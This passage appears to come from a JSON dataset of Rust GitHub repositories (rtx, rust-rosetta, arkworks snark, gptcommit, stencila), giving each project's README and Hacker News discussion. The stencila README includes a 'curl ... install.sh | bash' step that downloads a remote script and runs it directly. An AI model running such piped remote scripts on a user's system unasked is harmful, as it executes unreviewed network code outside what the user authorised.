number\n rtx install nodejs@20.0 Install a fuzzy version number\n\nHow is this different from doing specifying `nodejs@20.0.x` (which I guess asdf doesn't support)?In any case, I hope that, if I try to install a package/plugin and it doesn't exist, it won't just try to install a plugin/package whose name is similar? :nervous_look.jpg:I have been using asdf for over a year now, and I haven't seen `node -v` take so long. Actually, I used to use nvm and it was much slower than asdf, which was my main motivation to switch.I'm wondering if the lack of slowness I've seen could be due to my simplistic setup: globally set nodejs version, single nodejs version installed, with other tools like git installed by the distro package manager. I also have golang and some other stuff like rclone installed using asdf, but not much more.Did you also have a similar experience when initially installing node? Did you notice what triggered it or when did asdf start to become slow?I like asdf and would like to avoid making it slow on my laptop.Oh and can I safely assume that your home directory is on an SSD and not on an HDD?As mentioned in my other comment already, it's great to see someone is trying to provide a better alternative to asdf!From what I can tell by looking at the documentation of `rtx install`, rtx install # installs all runtimes specified in .tool-versions for installed plugins\n\nand of `rtx plugins install`, install a plugin\n\n note that rtx automatically can install plugins when you install a runtime\ne.g.: `rtx install nodejs@18` will autoinstall the nodejs pluginI take it there is still no way in rtx to simply install all plugins and runtimes listed in .tool-versions, without listing them one by one on the command line? Put differently, I would expect `rtx install` to install all runtimes specified in .tool-versions, including any plugins that are not installed yet.Would this be something that you would consider adding? I'm asking because not being able to install all plugins mentioned in .tool-versions automatically has been my biggest gripe with asdf.Not my project but found if while looking into the \"asdf\" project's performance issues ticket: https://github.com/asdf-vm/asdf/issues/290#issuecomment-1406...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "rust-rosetta/rust-rosetta", "link": "https://github.com/rust-rosetta/rust-rosetta", "tags": ["rosetta-code", "rust", "hacktoberfest"], "stars": 667, "description": "Implementing Rosetta Code problems in Rust.", "lang": "Rust", "repo_lang": "", "readme": "# rust-rosetta #\n![Continuous integration](https://github.com/rust-rosetta/rust-rosetta/workflows/Continuous%20integration/badge.svg)\n\nA repository for completing [this issue on rust-lang/rust](https://github.com/rust-lang/rust/issues/10513). This repository contains minimal working code for many simple (and not so simple) tasks. New contributors and learners of the language are welcome. We will try to work with you to make the code more idiomatic if you'd like!\n\nDevelopment is done on the `nightly` channel of Rust. You can get this using [`rustup`](https://www.rustup.rs/).\n\nThis is a project for learning. If you're working on a problem and need some help? Drop by #rust-rosetta on [irc.mozilla.org](https://kiwiirc.com/client/irc.mozilla.org). *(Note: It's an asynchronous protocol, responses may be slow!)*\n\n## Tasks Remaining ##\n\n[List of Tasks Remaining](http://rosettacode.org/wiki/Reports:Tasks_not_implemented_in_Rust)\n\n> Important: Not all `rust-rosetta` tasks exist in their current form on Rosetta Code. Please cross-check with this repository before you start. Alternatively, check out [rust-rosetta coverage](https://euclio.github.io/rosetta-coverage) to see an automatically generated report of which tasks have been implemented where.\n\n### Coverage ###\n\nThe main crate contains a `coverage` binary that is useful for discovering\nincomplete solutions, or finding solutions that are different from the version\nposted to the Rosetta Code wiki. To see what commands are available:\n\n```sh\n$ cargo run --release --bin coverage -- --help\n```\n\n## Tasks Complete ##\n\nAll tasks that have been completed are listed (along with a link to the problem) in [`Cargo.toml`](./Cargo.toml)\n\n## Contributing ##\n\nLooking to contribute? Great! Take a look at [CONTRIBUTING.md](CONTRIBUTING.md) to get started.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "arkworks-rs/snark", "link": "https://github.com/arkworks-rs/snark", "tags": ["cryptography", "zero-knowledge-proofs", "r1cs"], "stars": 666, "description": "Interfaces for Relations and SNARKs for these relations", "lang": "Rust", "repo_lang": "", "readme": "

SNARK and Relation Traits

\n\n

\n \n \n \n \n

\n\nThe arkworks ecosystem consists of Rust libraries for designing and working with __zero knowledge succinct non-interactive arguments (zkSNARKs)__. This repository contains efficient libraries that describe interfaces for zkSNARKs, as well as interfaces for programming them.\n\nThis library is released under the MIT License and the Apache v2 License (see [License](#license)).\n\n**WARNING:** This is an academic proof-of-concept prototype, and in particular has not received careful code review. This implementation is NOT ready for production use.\n\n## Directory structure\n\nThis repository contains two Rust crates:\n\n* [`ark-snark`](snark): Provides generic traits for zkSNARKs\n* [`ark-relations`](relations): Provides generic traits for NP relations used in programming zkSNARKs, such as R1CS\n\n## Overview\n\nThis repository provides the core infrastructure for using the succinct argument systems that arkworks provides. Users who want to produce arguments about various problems of interest will first reduce those problems to an NP relation, various examples of which are defined in the `ark-relations` crate. Then a SNARK system defined over that relation is used to produce a succinct argument. The `ark-snark` crate defines a `SNARK` trait that encapsulates the general functionality, as well as specific traits for various types of SNARK (those with transparent and universal setup, for instance). Different repositories within the arkworks ecosystem implement this trait for various specific SNARK constructions, such as [Groth16](https://github.com/arkworks-rs/groth16), [GM17](https://github.com/arkworks-rs/gm17), and [Marlin](https://github.com/arkworks-rs/marlin).\n\n## Build guide\n\nThe library compiles on the `stable` toolchain of the Rust compiler. To install the latest version of Rust, first install `rustup` by following the instructions [here](https://rustup.rs/), or via your platform's package manager. Once `rustup` is installed, install the Rust toolchain by invoking:\n```bash\nrustup install stable\n```\n\nAfter that, use `cargo`, the standard Rust build tool, to build the libraries:\n```bash\ngit clone https://github.com/arkworks-rs/snark.git\ncd snark\ncargo build --release\n```\n\n## Tests\nThis library comes with comprehensive unit and integration tests for each of the provided crates. Run the tests with:\n```bash\ncargo test --all\n```\n\n## License\n\nThe crates in this repo are licensed under either of the following licenses, at your discretion.\n\n * Apache License Version 2.0 ([LICENSE-APACHE](LICENSE-APACHE) or http://www.apache.org/licenses/LICENSE-2.0)\n * MIT license ([LICENSE-MIT](LICENSE-MIT) or http://opensource.org/licenses/MIT)\n\nUnless you explicitly state otherwise, any contribution submitted for inclusion in this library by you shall be dual licensed as above (as defined in the Apache v2 License), without any additional terms or conditions.\n\n[zexe]: https://ia.cr/2018/962\n\n## Acknowledgements\n\nThis work was supported by:\na Google Faculty Award;\nthe National Science Foundation;\nthe UC Berkeley Center for Long-Term Cybersecurity;\nand donations from the Ethereum Foundation, the Interchain Foundation, and Qtum.\n\nAn earlier version of this library was developed as part of the paper *\"[ZEXE: Enabling Decentralized Private Computation][zexe]\"*.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zurawiki/gptcommit", "link": "https://github.com/zurawiki/gptcommit", "tags": ["cli", "git", "githook", "large-language-models", "rust"], "stars": 665, "description": "A git prepare-commit-msg hook for authoring commit messages with GPT-3. ", "lang": "Rust", "repo_lang": "", "readme": "# `gptcommit`\n\n[![Github Contributors](https://img.shields.io/github/contributors/zurawiki/gptcommit.svg)](https://github.com/zurawiki/gptcommit/graphs/contributors)\n[![Github Stars](https://img.shields.io/github/stars/zurawiki/gptcommit.svg)](https://github.com/zurawiki/gptcommit/stargazers)\n[![CI](https://github.com/zurawiki/gptcommit/actions/workflows/ci.yml/badge.svg)](https://github.com/zurawiki/gptcommit/actions/workflows/ci.yml)\n\n[![crates.io status](https://img.shields.io/crates/v/gptcommit.svg)](https://crates.io/crates/gptcommit)\n[![crates.io downloads](https://img.shields.io/crates/d/gptcommit.svg)](https://crates.io/crates/gptcommit)\n[![Rust dependency status](https://deps.rs/repo/github/zurawiki/gptcommit/status.svg)](https://deps.rs/repo/github/zurawiki/gptcommit)\n\nA git prepare-commit-msg hook for authoring commit messages with GPT-3. With this tool, you can easily generate clear, comprehensive and descriptive commit messages letting you focus on writing code.\n\nSee [announcement blog post](https://zura.wiki/post/never-write-a-commit-message-again-with-the-help-of-gpt-3/).\n\n## Demo\n\n[![asciicast](https://asciinema.org/a/552380.svg)](https://asciinema.org/a/552380)\n\n## Installation\n\n1. Install this tool locally with `cargo` (recommended).\n\n```sh\ncargo install --locked gptcommit\n```\n\nor on macOS, use homebrew\n\n```sh\nbrew install zurawiki/brews/gptcommit\n```\n\n2. In your `git` repository, run the following command to install `gptcommit` as a git prepare-commit-msg hook. You will need to provide an OpenAI API key to complete the installation.\n\n```\ngptcommit install\n```\n\n## Usage\n\nTo use `gptcommit`, simply run `git commit` as you normally would. The hook will automatically generate a commit message for you using GPT-3. If you're not satisfied with the generated message, you can always edit it before committing.\n\nNote: By default, `gptcommit` uses the GPT-3 model. Please ensure you have sufficient credits in your OpenAI account to use it.\n\n## Features\n\n`gptcommit` supports a number of configuration options that are read from `$HOME/.config/gptcommit/config.toml`.\nConfigs are applied in the following order:\n\n- User settings as read from `$HOME/.config/gptcommit/config.toml`.\n- The settings as read from the repo clone at `$GIT_ROOT/.git/gptcommit.toml`.\n- Environment variables starting with `GPTCOMMIT__*`.\n\n### Set your OpenAI API key\n\nPersist your OpenAI key\n\n```sh\ngptcommit config set openai.api_key sk-...\n```\n\nor set it just for you local repo:\n\n```sh\ngptcommit config set --local openai.api_key sk-...\n```\n\nYou can also config this setting via the `GPTCOMMIT__OPENAI__API_KEY`.\n\nTo maintain compatibility with other OpenAI clients, we support the `OPENAI_API_KEY` environment variables. This will take the highest precedence.\n\n### Try out a different OpenAI model\n\n`gptcommit` uses `text-davinci-003` by default. The model can be configured to use other models as below\n\n```sh\ngptcommit config set openai.model text-davinci-002\n```\n\nYou can also config this setting via the `GPTCOMMIT__OPENAI__MODEL`.\n\nFor a list of public OpenAI models, checkout the [OpenAI docs](https://beta.openai.com/docs/models/overview). You can also bring in your own fine-tuned model.\n\n### Allow re-summarizing when amending commits\n\n```sh\ngptcommit config set allow-amend true\n```\n\n## Common Issues / FAQs\n\n### How can I reduce my OpenAI usage bill?\n\nIn the current design, gptcommit issues N+2 prompts, where N is the number of modified files with diffs under the max_token_limit. The other prompts are the title and summary.\n\nOpenAI Completions are billed by \"tokens\" that are both sent and generated. Pricing per token depends on the model used. The number of tokens generated are generally predictable (as a commit message is usually only so big) but gptcommit could be sending over a lot of tokens in the form of diff data.\n\nToday, I see two low-hanging solutions for reducing cost:\n\n- Switch to a different model using the openai.model configuration option\n- Reduce the side of prompts and diff data sent to OpenAI\n\nOpenAI's pricing page can be found at\n\n\n### The githook is not running when I commit\n\nBy default, the githook is only run for new commits.\nIf a template is set or the commit is being amended, the githook will skip by default.\n\nBecause the githook detected the user is supplying their own template, we make sure not to overwrite it with GPT. You can remove the commit template by making sure `git config --local commit.template` is blank.\n\nYou can allow gptcommit to summarize amended commits with the following configuration above.\n\n## Derived Works\n\nAll of these awesome projects are built using `gptcommit`.\n\n- A VSCode extension you can\n [install here](https://marketplace.visualstudio.com/items?itemName=pwwang.gptcommit) | [GitHub](https://github.com/pwwangvscode-gptcommit)\n\n## Encountered any bugs?\n\nIf you encounter any bugs or have any suggestions for improvements, please open an issue on the repository.\n\n\n## License\n\nThis project is licensed under the [MIT License](./LICENSE).\n", "readme_type": "markdown", "hn_comments": "There are tools that I wish didn\u2019t exist and this is one of them.Why are the demos videos?If you're unable to write your own commit messages that's a strong signal to me that either your commits are too large or that you're unable to explain in simple words what you just did. While the first can be remedied I would find it hard working with someone who consistently displayed the second.I can kind of understand getting help writing the description of a large PR. But a commit message? Whose commits are so long so often that they need the help of an AI assistant to come up with the contents?Cool, but I hope his is never used as is, just submit with some keyword and call the latest version of GPT on the diff when looking through the history later. A bad commit message is worse than no message and it can\u2019t be easily fixed.The very last thing you should do is commit a GPT-3 generated commit message for a fairly simple reason: if GPT-3 can interpret and and explain the change as written, there is no reason to commit that message. You will always be able re-run the generator at any later date, over any range of changes, to get the same or (presumably, in future) improved results.As pointed out by other comments, the commit message should be telling you facts about the change that are not evident from the change itself. GPT-3 can't tell readers why the change happened.To everyone hating on this...I think a GPT-3 summary of a diff is a great thing to have, because it's a summary of the change and thus can be quicker to grok than picking through a diff. Also this doesn't seem to preclude a developer adding their own text to the commit (the why, etc). Finally, if the summary looks weird/incoherent it could serve as a signal to the developer that the commit needs more work.this is awful.1. If automating writing commit messages significantly improves your experience as a developer, you're doing something wrong.2. If GPT-3 can write commit messages even close to as clear as you can, you're doing something wrong.Comments here are acting like you can't add/edit the commit. It offers a starting point. Yes it's just-above-diff level, but it is at-least-above-diff level.But my main though is that IDK about using this for anything closed source. Feed openai's API your codebase, one commit at a time. Even if they promise not to train on your prompt history today, ToS could change. Seems fine if you run it locally though.Fun fact: you can probably turn this around too: Write a fictional commit history and have ChatGPT generate the actual commits for you.Did the OP use the tool to write his own commit messages?A lot of the commit messages were typical and sort of redundant but this one stood out to me\nhttps://github.com/zurawiki/gptcommit/commit/82294555e7269e6...\"Add github token to address GH Workflow rate limits\"This is a good commit message, it describes a problem and a solution. I'd be very impressed if the GPTCommit tool wrote this and knew why the github token was being added.I don\u2019t get the hate. Don\u2019t use it all the time, but this could be useful as part of a danger report.A readable summary for the ones who may not understand code - your developer will never write that.Might as well commit \u201cI don\u2019t remember writing that commit\u201d because that\u2019s going to be your every answer when someone has a question about what you did.I'll write a shitload of commit messages before I'll give OpenAI my phone number.Neat concept, but this opens up a can of worms for corporate security. Pretty sure I won't get approval to submit proprietary code to a third party service just because I was too lazy to write a few lines of text. Might be helpful to open source projects?At least the first line of commit messages shouldn\u2019t describe WHAT changed but WHY the change was made.Now do this for branching strategies.This is amazing. Humans should only need to read commit messages, never write them.The repo for this isn't eating it's own dogfood.I don't really ever want to read answers from GPT to questions that I didn't knowingly myself ask GPT. If GPT can write a commit message from you, don't write it at all and let me ask it that if that's what I want. It may be a positive to you to spend a few seconds less on commit messages but it's a net negative for the world for it to become polluted with vast amounts of flatly incorrect text with no knowledge as to its provenance. I'd rather have no commit message than one that I can't trust whether it's written by the same human that wrote the code or not.Put another way, you asking GPT for stuff that it learned from Stack Overflow: good. Using it to post to Stack Overflow: bad.I find commit messages have more value when they don't just repeat what you can see by looking at a diff but when they explain the reasons behind.In the early days of Covid, the web was awash with all sorts of stupid fucking designs that reimagined public space under the new normal or whatever. It was chaff that creators and readers alike knew would never be put to practical use, or even be produced in the first place. There's a good writeup about it here.https://mcmansionhell.com/post/618938984050147328/coronagrif...I think the same phenomenon is at play here. Everybody sharing their own silly parrot tricks: it's the least interesting topic in the world right now.With WhatTheCommit [1], I never have to come up with commit messages again. /sI even wrote an IntelliJ IDEA plugin 9 years ago [2]. Half as a joke, half to learn about IDEA plugin development. I'm puzzled by seing so many people actually using it. Last month the HTTP link became invalid, and soon after someone opened a PR with a fix. I really hope noone actually uses those commit messages on shared repositories.[1] https://whatthecommit.com/[2] https://darekkay.com/blog/what-the-commit-plugin-for-intelli...If you're looking for a Python variant of this tool: https://github.com/abi/autocommitI was wondering if there is a possibility of obtaining an offline version of the service, in order to mitigate the inherent risks associated with transmitting proprietary code to external servers, thus ensuring optimal security and confidentiality of said code?Writing commit messages (or comments in general) is like practicing vocabulary, but for your mental understanding of the current problem.Taking a step back and thinking about what I have actually done often helps me to find misconceptions, the worst bugs of them all.Automating this away would be like learning a foreign language by pasting book exercises into a translation app... you may get good grades, but does it help your understanding if you didn't put in the effort yourself?Because what we need is more of the what was done, with no regard to the why. Why provide any context as to why the change was made when you can fill it with an AI description of what one could accurately tell by looking at the code? I kinda can't believe this isn't a joke. Just squash it to the emoji that best captures the sentiment! Why use the tool to enhance you and your peers lives, when you can use AI to make it pointless!Perhaps this could be more useful if it could be fed information from a bug tracker, so it could use the context to create a meaningful (if inaccurate) commit message.Be more impressed if I write the commit message and GPT writes the code than vice versa.If I wrote the code, writing a commit message is trivial.I like writing commit messages. I find it helps me to think through and explain the change that I'm committing. personal quirk: for major commits I'll add fun ascii art, just as a treatThis is interesting but I\u2019d hate to work on a project where this was used. Commits should tell me why a change happened not just what code changed.I don't want to debate the presence or absence of merits in this tool (these are extensively covered in other comments), but I want to point out that even in the demo examples 2 out of 3 commit messages are plainly incorrect:- in Demo 1 tool wrote \"Switch to colored output...\" while in the diff we can see that colored output was already present;- in Demo 3 tool wrote \"Add installation options and demo link to README\", while in the actuall diff we only see a link being added, no changes to installation options.Props to the author for being honest and not cherry-picking the examples.The peak of human society right hereThe worst part about GPT-3 is people using it to automate things where the entire value comes from what the human annotates rather than automates. This is an idea, which like many others involving GPT-3, which I believe will destroy more value than it creates.This is horrible. Commit messages should contain the reason why this change has been made and not imprecise prose summaries of what the diff looks like.This is fun.Would also be cool to generate commit messages while viewing history, it could really do a good job of orienting you. I'm imagining \"human commit msg | gpt commit msg\" so you can look at both. It's a little simplistic right now, kinda just describes the diff, but GPT-3.2 could rock.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "stencila/stencila", "link": "https://github.com/stencila/stencila", "tags": ["executable", "documents"], "stars": 665, "description": "Author, collaborate on, and publish beautiful interactive documents", "lang": "Rust", "repo_lang": "", "readme": "
\n\t\"Stencila\"\n
\n
\n\n## \ud83d\udc4b Welcome\n\nThis is the main repository of [Stencila](https://stenci.la), a platform for authoring, collaborating on, and publishing executable documents.\n\nStencila is comprised of several open source packages, written in a variety of programming languages. This repo acts as an entry point to these other packages as well as hosting code for our desktop and CLI tools.\n\nWe \ud83d\udc95 contributions! All types of contributions: ideas \ud83e\udd14, examples \ud83d\udca1, bug reports \ud83d\udc1b, documentation \ud83d\udcd6, code \ud83d\udcbb, questions \ud83d\udcac. If you are unsure of where to make a contribution feel free to open a new [issue](https://github.com/stencila/stencila/issues/new) or [discussion](https://github.com/stencila/stencila/discussions/new) in this repository (we can always move them elsewhere if need be).\n\n
\n\n## \ud83d\udcdc Help\n\nFor documentation, including demos and reference guides, please go to our Help site https://help.stenci.la/. That site is developed in the [`help`](help#readme) folder of this repository and contributions are always welcome.\n\n
\n\n## \ud83c\udf81 Hub\n\nIf you don't want to install anything, or just want to try out Stencila, https://hub.stenci.la is the best place to start. It's a web application that makes all our software available via intuitive browser-based interfaces. You can contribute to Stencila Hub at [`stencila/hub`](https://github.com/stencila/hub).\n\n
\n\n## \ud83d\udda5\ufe0f Desktop\n\nIf you'd prefer to use Stencila on your own computer, the Stencila Desktop is a great place to start. It is still in the early stages of (re)development but please see the [`desktop`](desktop#readme) folder for its current status and how you can help out!\n\n
\n\n## \u2328\ufe0f Command line tool\n\n### \ud83d\udce6 Install\n\nThe CLI is is early stages of development (all contributions welcome!). We don't necessarily recommend installing it yet, but if you are an early adopter, we'd also appreciate any feedback \ud83d\udc96. You can download standalone binaries for MacOS, Windows or Linux from the [latest release](https://github.com/stencila/stencila/releases/latest).\n\n#### Windows\n\nTo install the latest release download `stencila--x86_64-pc-windows-msvc.zip` from the [latest release](https://github.com/stencila/stencila/releases/latest) and place it somewhere on your `PATH`.\n\n#### MacOS\n\nTo install the latest release in `/usr/local/bin` just use,\n\n```bash\ncurl -L https://raw.githubusercontent.com/stencila/stencila/master/install.sh | bash\n```\n\nTo install a specific version, append `-s vX.X.X`. Or, if you'd prefer to do it manually, download `stencila--x86_64-apple-darwin.tar.gz` from the one of the [releases](https://github.com/stencila/stencila/releases) and then,\n\n```bash\ntar xvf stencila-*.tar.gz\nsudo mv -f stencila /usr/local/bin # or wherever you prefer\n```\n\n#### Linux\n\nTo install the latest release in `~/.local/bin/` just use,\n\n```bash\ncurl -L https://raw.githubusercontent.com/stencila/stencila/master/install.sh | bash\n```\n\nTo install a specific version, append `-s vX.X.X`. Or, if you'd prefer to do it manually, download `stencila--x86_64-unknown-linux-gnu.tar.gz` from the one of the [releases](https://github.com/stencila/stencila/releases) and then,\n\n```bash\ntar xvf stencila-*.tar.gz\nmv -f stencila ~/.local/bin/ # or wherever you prefer\n```\n\n### \ud83d\ude80 Use\n\nGet started by consulting the built-in help:\n\n```sh\nstencila help\n```\n\n### \ud83d\udee0\ufe0f Develop\n\nThe CLI is developed in the [../rust](../rust) folder. See there for more details.\n \n\n
\n\n## \ud83d\udd0c Plugins\n\nThe `stencila` Hub, Desktop and CLI all rely on _plugins_ to provide much of their functionality. You can install plugins using the `stencila` Desktop or CLI tool using it's name or an alias,\n\n```sh\nstencila plugins install \n```\n\nThe following table lists the main plugins. These plugins are in various stages of development and not all of them are compatible with the Desktop and CLI. Generally, it won't be worth installing them prior to `v1` and coverage of at least 90%.\n\n> \ud83d\udea8 We are the process of deprecating the \"executor\" plugins `rasta`, `pyla` and `jesta` and instead focussing on a tighter integration with Jupyter kernels by way of porting the functionality in `jupita` into the core Rust library.\n\n| Plugin | Aliases | Version | Coverage | Primary functionality |\n| -------- | ------------ | ----------- | ----------- | -------------------------------------------------------- |\n| [encoda] | `converter` | ![encoda-v] | ![encoda-c] | Convert documents between file formats |\n| [jesta] | `javascript` | ![jesta-v] | ![jesta-c] | Compile, build and execute documents that use JavaScript |\n| [rasta] | `r` | ![rasta-v] | ![rasta-c] | Compile, build and execute documents that use R |\n| [pyla] | `python` | ![pyla-v] | ![pyla-c] | Compile, build and execute documents that use Python |\n| [jupita] | `jupyter` | ![jupita-v] | ![jupita-c] | Execute documents that use Jupyter kernels |\n| [dockta] | `docker` | ![dockta-v] | ![dockta-c] | Build Docker images for executable documents |\n| [nixta] | `nix` | ![nixta-v] | ![nixta-c] | Build Nix environments for executable documents |\n\n
\n\n## \ud83d\udc33 Docker images\n\nYou can use Stencila as a Docker image. We provide several images of varying sizes and capabilities. All include the `stencila` CLI as the image `ENTRYPOINT` but add varying numbers of plugins and packages.\n\nAt present the number of images listed below is limited. We plan to move the generic images e.g. [`stencila/executa-midi`](https://hub.docker.com/r/stencila/executa-midi) (which are currently built in the `dockta` repository), to this repository as we reach plugin compatibility for the relevant language packages.\n\n| Image | Size | Description |\n| ------------------- | ---------------------- | ------------------------------------ |\n| [stencila/stencila] | ![stencila-stencila-s] | Base image containing `stencila` CLI |\n| [stencila/node] | ![stencila-node-s] | Adds Node.js and `jesta` |\n\n
\n\n## \ud83d\udc69\u200d\ud83d\udcbb Language bindings\n\nIf you prefer, you can use Stencila from within your favorite programming language. Some of these language bindings are in an early, proof-of-concept state and are likely to be developed further only based on demand. If your favorite language is missing, or you would like to help us develop the bindings, [let us know!](https://github.com/stencila/stencila/discussions/new)\n\n| Language | Bindings | Status |\n| -------- | ----------------------- | --------------------------------- |\n| Node | [node](node#readme) | In-development (used for Desktop) |\n| Python | [python](python#readme) | Experimental |\n| R | [r](r#readme) | Experimental |\n\n[encoda]: https://github.com/stencila/encoda#readme\n[jesta]: https://github.com/stencila/jesta#readme\n[pyla]: https://github.com/stencila/pyla#readme\n[rasta]: https://github.com/stencila/rasta#readme\n[jupita]: https://github.com/stencila/jupita#readme\n[dockta]: https://github.com/stencila/dockta#readme\n[nixta]: https://github.com/stencila/nixta#readme\n[encoda-v]: https://img.shields.io/github/v/release/stencila/encoda\n[jesta-v]: https://img.shields.io/github/v/release/stencila/jesta\n[rasta-v]: https://img.shields.io/github/v/release/stencila/rasta\n[pyla-v]: https://img.shields.io/github/v/release/stencila/pyla\n[dockta-v]: https://img.shields.io/github/v/release/stencila/dockta\n[nixta-v]: https://img.shields.io/github/v/release/stencila/nixta\n[jupita-v]: https://img.shields.io/github/v/release/stencila/jupita\n[encoda-c]: https://img.shields.io/codecov/c/github/stencila/encoda\n[jesta-c]: https://img.shields.io/codecov/c/github/stencila/jesta\n[rasta-c]: https://img.shields.io/codecov/c/github/stencila/rasta\n[pyla-c]: https://img.shields.io/codecov/c/github/stencila/pyla\n[dockta-c]: https://img.shields.io/codecov/c/github/stencila/dockta\n[nixta-c]: https://img.shields.io/codecov/c/github/stencila/nixta\n[jupita-c]: https://img.shields.io/codecov/c/github/stencila/jupita\n[stencila/stencila]: https://hub.docker.com/r/stencila/stencila\n[stencila/node]: https://hub.docker.com/r/stencila/node\n[stencila-stencila-s]: https://img.shields.io/docker/image-size/stencila/stencila?label=size&sort=semver\n[stencila-node-s]: https://img.shields.io/docker/image-size/stencila/node?label=size&sort=semver\n", "readme_type": "markdown", "hn_comments": "Hello HN,Lots of people are willing to share there visual components for others to use and remix. This is great! There are thousands of stencils and component libraries out there. There is a problem though. You share your work in a closed ecosystem, the ecosystem of the design software you use. Sketch, Figma, one of the many Adobe's, OmniGraffle, you name it.To address this problem I started the SVG Stencils Project. SVG Stencils is a community driven project with the ambition to be an ecosystem for every designer, no mather what software or platform you use. As long as you can drag an SVG-file from your browser into your canvas you're good to go.The core part of SVG Stencils is the webapp hosted on GitHub. The SVG-components listed here can be dragged directly from your browser into your canvas.In a nutshell:- SVG Stencils are free for personal and commercial use- SVG Stencils and all its content will stay forever free and open source- Everyone can contribute by creating and submitting new stencils- Inkscape Extension for creating and publishing stencils- Good documentation- No advertisingHope you like it and I'm very excited to hear what you think off SVG StencilsHi HN,Lots of people are willing to share there visual work for others to use and remix. This is great! There are thousands of stencils and component libraries out there. There is a problem though. You share your work in a closed ecosystem, the ecosystem of the design software you use. Sketch, Figma, one of the many Adobe's, OmniGraffle, you name it.To address this problem I started the SVG Stencils Project. SVG Stencils is a\ncommunity driven project with the ambition to be an ecosystem for every designer, no mather what software or platform you use. As long as you can drag\nan SVG-file from your browser into your canvas you're good to go.The core part of SVG Stencils is the webapp hosted on GitHub. The SVG-components listed here can be dragged directly from your browser into your canvas.In a nutshell:- SVG Stencils are free for personal and commercial use\n- SVG Stencils and all its content will stay forever free and open source\n- Everyone can contribute by creating and submitting new stencils\n- Inkscape Extension for creating and publishing stencils\n- Good documentationHope you like it and I'm very excited to hear what you think off SVG Stencils.PS. If your from New Zealand, sorry for the world map without NZ. I'll replace this one ASAP.This article highlights Stencil's performance, which is great.As a dev, I think Stencil's superpower is that it can future proof your components. You can write a Stencil component and you can later use it in Angular or Vue or React or Elm or whatever. Or maybe even no framework at all -- just a templated server generated page with some Stencil components.That's pretty nice for a team that's transitioning between one framework and another or uses two different frameworks on two different sites but would like to share components between the two.Is AlpineJs a better Stencil ;) ;) ;) . Sorry couldn't resist ...Stencil is the best way to write Web Components if not a better React. If you like you can also write entire apps and Ionic library is perfect component library for it. It is fun to use and also uses TypeScript and it's simple and easy to understand.:\\13 years ago...Is Mootools a better jQuery?I tried Stencil a year ago and I didn't see anything too novel to warrant further investigation.One nitpick for the OP: the side-by-side code examples are screenshots without syntax highlighting. For an article comparing two frontend frameworks, that's quite an oversight.In their side-by-side, they use syntax conventions from 4 years ago for React (class based components and even using var to declare variables) while using the latest syntax conventions for Stencil.How is that a fair comparison?Stencil creators here. We love the title, but that is not our goal. We built Stencil for a very specific use case: building out a bunch of Web Components for our Ionic Framework project so they could run in any frontend stack. Stencil will generate React, Angular, and Vue bindings from a standard Web Component base, so developers in each of those frameworks get the native experience they expect, and any issues using Web Components (in React, for example) are smoothed out and fixed.Stencil is really focused on building design systems and reusable component sets, like the kind we needed for Ionic Framework.I can't wait to save the article's screenshots of code blocks to my Pinterest account!Ah, c'mon, I just recently became an expert in React.IMO TodoMVC is not a good way to compare front-end libraries/frameworks because the necessary complexity is too low to demonstrate how issues that would happen in a larger code base would be solved.\"server-side rendering with client side dehydration\"lol wtf \"dehydration\" haha (also \"Rolloup\")Still don't really get what Stencil is. Is it a actual single framework or a standard syntax that compiles to React, vue, .. component syntax? This talks about compiling JSX to bindings avoiding vdom diffing but as far as I know that is near impossible to do due to the variable nature of JSX..?And just a wall of unhighlighted fixed with code is very difficult to compare the differences. And would rather see bundle size comparisons rather than 6 lighthouse screenshots.We ended up not using it because of it's lack of ecosystem which is pretty ironic for an interoperable framework.\nE.g no documented mobx support, no competitive router.It\u2019s not solving enough problems or different enough for me to consider it seriously.If they're going to compare the two, at least use the React functional hooks pattern. They're comparing Stencil to the (basically) obsolete OO components pattern.There's a couple performance issues opened on the Stencil repo, as well as documented developer experience requests (e.g, Source Maps). With additional investment, I think Stencil has further potential to be an influential evolution in the front-end stack.Stencil the framework - perhaps not.But the idea of compiling to an (asymptotically) optimal vanilla JS application is a breath of fresh air in a world of Virtual DOM, Reactive Programming, Hooks etc.My favourite thing about this approach is that the end result is even half-readable, so with some practice it's possible to understand what's going on in your stack trace.I've been a front end developer for 18 years now and I've been tired of JS framework hype for almost half of those years. I saw the note from the creators that this was designed for a specific use case. That's great! It would also be great if the rest of the JS dev community would stop trying to find the Next New React. Please make it stop.Yes, It enables creating web components, static site generation, server-side rendering with client side dehydration. It even has documentation generation for Stencil components.I've been keeping an eye on Solid for my next project. It seems small, fast and ergonomic.I've been using Stencil to create a share component library for different projects/teams where I work. I've been pretty impressed. Soon our library will be used in React, Aurelia, and possibly Ember projects!> The third difference is event binding, where in Stencil they promote using arrow functions while React promotes explicit binding using the .bind() function.Does React really? I haven't used `.bind` in years, even before moving to mostly hooks-based components.In this React doc [1] it describes .bind as being for ES2015, and recommends arrow functions for ES6, except if it causes optimization issues.1. https://reactjs.org/docs/faq-functions.htmlAny headline that ends in a question mark can be answered by the word \"no\". -- Ian BetteridgeThis type of asshole marketing seems to become more and more popular. I saw ads for Amazon Video the other day on the floors of Dortmund, Germany.A simple improvement. add pins (even temporarily) to the PCB. Add pin holes to the top acrylic template. No need for the lower (outer) acrylic part. Plus the pin holes force very good alignment.Interesting idea. I've always done all of those parts with tweezers and eyeballs, but some of the TSSOP packages can be a bit of a challenge to line up well enough for reflow.If you used FR4 instead of acrylic or whatever, you might be able to leave the aligner stencil in place for reflow. That might let you do some of the smaller parts.\"While this setup has been working really well for large parts, small components haven't worked out\".Too bad. This is a good idea. I have some boards with lots of small components where this would help, and I have access to laser cutters. Maybe with a thinner plastic layer on top... Also, with small components, getting the placement stencil off without taking the tiny components with it may be tough.Board edge shearing is less precise than the pad placement, and this thing uses a base frame to align to the board edge. Pick and place machines align to reference marks on the board, using cameras. You might need some kind of fine screw adjustment to move the board very slightly.I've seen videos of the Liteplacer, which is a slow pick and place machine for prototypes. It's useful for when you are only making a very small number of boards, because it can work from components laid out in wells or on tape that's not on reels. The production oriented machines require that you have enough components on reels to get the feeders started.DirtyPCBs has never done me wrong, and they offer a cheap laser acrylic service, hmmm!http://dirtypcbs.com/store/lasercutSince I don't have a laser cutter (yet?): Would 3D printing the jig 